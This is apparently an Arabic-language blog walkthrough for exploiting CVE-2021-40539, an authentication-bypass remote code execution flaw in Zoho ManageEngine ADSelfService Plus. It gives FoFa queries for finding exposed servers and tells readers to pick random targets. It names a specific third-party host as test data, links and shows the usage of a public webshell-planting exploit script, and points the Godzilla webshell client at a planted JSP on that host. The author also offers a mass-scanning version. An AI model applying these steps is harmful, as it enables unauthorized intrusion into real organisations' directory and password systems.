
CVE-2021-40539:ثغرة RCE في ADSelfService Plus
CVE-2021-40539: ثغرة RCE في ADSelfService Plus 1: وصف الثغرة ZOHO ManageEngine ADSelfService Plus هو حل متكامل لإدارة كلمات المرور الذاتية وتسجيل الدخول الموحد من شركة ZOHO لـ Active Directory وتطبيقات السحابة. CVE-2021-40539 يوجد ثغرة تجاوز المصادقة في REST API في Zoho ManageEngine ADSelfService Plus الإصدار 6113 والإصدارات الأقدم، يمكن للمهاجم عن بُعد استغلال هذه الثغرة للتحكم في النظام المتأثر. تقييم CVSS لهذه الثغرة: 9.33، مستوى الخطورة: حرج. 2: استغلال الثغرة الخطوة 1: استعلام FoFa انسخ الكود
# Fofa搜索语法
"ADSelfService"
app="ZOHO-ManageEngine-ADSelfService"
header="JSESSIONIDADSSP" //推荐
# 测试数据
https://adself.66nao.com/
الخطوة 2: ابحث عن أهداف عشوائية واستخدم سكريبت الاختبار التالي لاختبار الثغرة.... https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py طريقة الاستخدام:
C:\Users\26629\Desktop\CVE-2021-40539-main>python39 exploit.py
usage: exploit.py [-h] -t TARGET [-w WEBSHELL] [-j JAVA_CLASS] [-s]
exploit.py: error: the following arguments are required: -t/--target
الخطوة 3: استخدم Godzilla للاتصال وإجراء اختبار التحقق.... C انسخ الكود 1 https://adself.66nao.com//help/admin-guide/test.jsp
ما تم تنزيله من GitHub هو أداة مسح فردية. قمت بتطويره ثانويًا، وأضفت وحدة مسح جماعي باستخدام -f، يمكن للجميع تنزيله واستخدامه.